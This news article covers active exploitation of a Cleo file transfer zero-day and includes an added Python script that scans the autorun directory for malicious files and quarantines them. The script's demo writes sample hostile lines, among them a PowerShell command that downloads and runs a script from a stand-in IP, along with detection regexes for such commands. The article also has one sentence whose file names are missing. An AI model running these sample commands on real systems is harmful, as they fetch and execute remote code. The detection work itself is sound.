Hackers Exploiting Cleo Software Zero-Day

Attackers Target Managed File Transfer Software Vulnerabilities

Update Dec. 12, 2024, 00:34 UTC: A Cleo spokesperson said the company has released a new patch to address active hacking of its file transfer software. "Cleo strongly recommends customers apply the available patch immediately."

File transfer software made by Cleo Communications is under active attack and a patch meant to stymie hackers doesn't fix the flaw, say security researchers from Huntress.

Hackers are exploiting an arbitrary file-write vulnerability tracked as CVE-2024-50623 along with a feature in Cleo software that automatically executes files in the autorun directory.

Huntress said it first identified on Dec. 3 a vulnerability affecting Cleo's LexiCom, VLTransfer and Harmony software products. The privately held, Illinois-based file transfer company on Monday published a patch - but the fix "does not mitigate the software flaw," Huntress wrote the same day.

Cybersecurity researchers say Cleo employees vowed during a Zoom call to develop a second patch. Cleo on Wednesday afternoon said it has identified an unauthenticated malicious hosts vulnerability that could lead to remote code execution, with a CVE identifier "pending."

In an emailed statement, a Cleo spokesperson said the company promptly "launched an investigation with the assistance of outside cybersecurity experts, notified customers of this issue and provided mitigation steps customers should immediately take to address the vulnerability while a patch is under development. Our investigation is ongoing."

Huntress advised Cleo customers to delete contents from the autorun directory, disabling attack paths through that function. "This will not prevent the arbitrary file-write vulnerability until a patch is released," Huntress warned.

Cleo file transfer software is used in industries with large-scale logistics and supply chain operations. Huntress wrote that it spotted "at least 10 businesses" with compromised Cleo servers, with a "notable uptick in exploitation observed on Dec. 8 around 07:00 UTC." The majority of customers with a Cleo hacking problem are in the consumer products, food, trucking and shipping sectors. A search on Shodan showed 436 vulnerable servers, the vast majority of them located inside the United States.

The attack chain begins with hackers planting malicious files in the autorun directory, which triggers their automatic execution. The files enable attackers to invoke PowerShell commands, gaining persistent access through webshells retrieved from external servers. Uploaded malicious autorun files have included the files and .
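The two technical points above, the Huntress advice to empty the autorun directory and the described chain of autorun file to PowerShell to externally hosted webshell, can be turned into a quick triage step for a suspect host. The following is an added example written for this article, not Cleo's or Huntress's code: it walks an autorun directory, flags files whose content hands off to PowerShell or fetches from an external host, and moves the flagged files to a quarantine folder so they are removed from the autorun path but kept as evidence. The default path C:\LexiCom\autorun, the indicator patterns and the sample file contents are all this example's own assumptions; the sample files are constructed and use no real Cleo command syntax.

```python
"""Triage a Cleo autorun directory for files that would invoke PowerShell.

Added example, not Cleo's or Huntress's code. The autorun path, the indicator
heuristics and the sample file contents are this example's own assumptions.
"""
import re
import shutil
import tempfile
from pathlib import Path

# Cleo products execute files dropped in an "autorun" folder under the install
# root. The exact location below is an assumption; adjust it per host.
DEFAULT_AUTORUN_DIR = Path(r"C:\LexiCom\autorun")

# Heuristics for the behaviour described in the article: an autorun file that
# hands off to PowerShell and pulls a second stage from an outside host.
# These are example patterns, not a published detection signature.
INDICATORS = {
    "powershell_invocation": re.compile(r"\bpowershell(\.exe)?\b", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "remote_fetch": re.compile(
        r"(downloadstring|downloadfile|invoke-webrequest|webclient|curl\s|wget\s)", re.I
    ),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}", re.I),
}


def scan_text(text):
    """Return the sorted names of indicators that match one file's content."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def triage_autorun(autorun_dir, quarantine_dir=None):
    """Inspect every regular file in autorun_dir.

    Returns a list of (file name, matched indicators) for files that hit at
    least one indicator. If quarantine_dir is given, flagged files are moved
    there: this is the containment step Huntress recommended (clear the
    autorun directory) while preserving the files for forensic review.
    """
    autorun_dir = Path(autorun_dir)
    findings = []
    for path in sorted(p for p in autorun_dir.iterdir() if p.is_file()):
        # Read leniently; observed payloads were text, but anything may land here.
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings.append((path.name, hits))
            if quarantine_dir is not None:
                Path(quarantine_dir).mkdir(parents=True, exist_ok=True)
                shutil.move(str(path), str(Path(quarantine_dir) / path.name))
    return findings


def demo():
    """Run the triage against constructed sample files in a temp directory."""
    work = Path(tempfile.mkdtemp(prefix="cleo-autorun-"))
    autorun = work / "autorun"
    autorun.mkdir()
    # Constructed benign content: a plain maintenance note.
    (autorun / "cleanup_example.txt").write_text(
        "rotate transfer logs older than 30 days\n"
    )
    # Constructed malicious content modelled on the article's description:
    # PowerShell launched with an encoded command (base64 is UTF-16LE text).
    (autorun / "encoded_example.txt").write_text(
        "cmd.exe /c powershell -NonInteractive -enc "
        "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA\n"
    )
    # Constructed malicious content: fetch a script from an external IP
    # (192.0.2.10 is a documentation address) and evaluate it in memory.
    (autorun / "fetch_example.txt").write_text(
        "powershell -c \"IEX (New-Object Net.WebClient)"
        ".DownloadString('http://192.0.2.10/shell.ps1')\"\n"
    )
    findings = triage_autorun(autorun, quarantine_dir=work / "quarantine")
    remaining = sorted(p.name for p in autorun.iterdir())
    return findings, remaining


if __name__ == "__main__":
    for name, hits in demo()[0]:
        print(f"{name}: {', '.join(hits)}")
```

Run it with a real path (`triage_autorun(DEFAULT_AUTORUN_DIR, quarantine_dir=...)`) on a host you suspect; as the article notes, emptying the autorun directory only removes this execution path and does nothing for the underlying arbitrary file-write flaw, so the server still needs the vendor fix once one is available.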

Cybersecurity researcher Kevin Beaumont posted that among the cybercriminal groups exploiting the Cleo vulnerability is the Termite ransomware operation. Apparently active since April, Termite uses a modified version of the leaked Babuk cryptolocker malware. It boosted its profile by claiming responsibility in late November for an attack against supply chain management software provider Blue Yonder that has disrupted operations at Starbucks and major British supermarket chains (see: Ransomware Attack on Supply Chain Provider Causes Disruption).
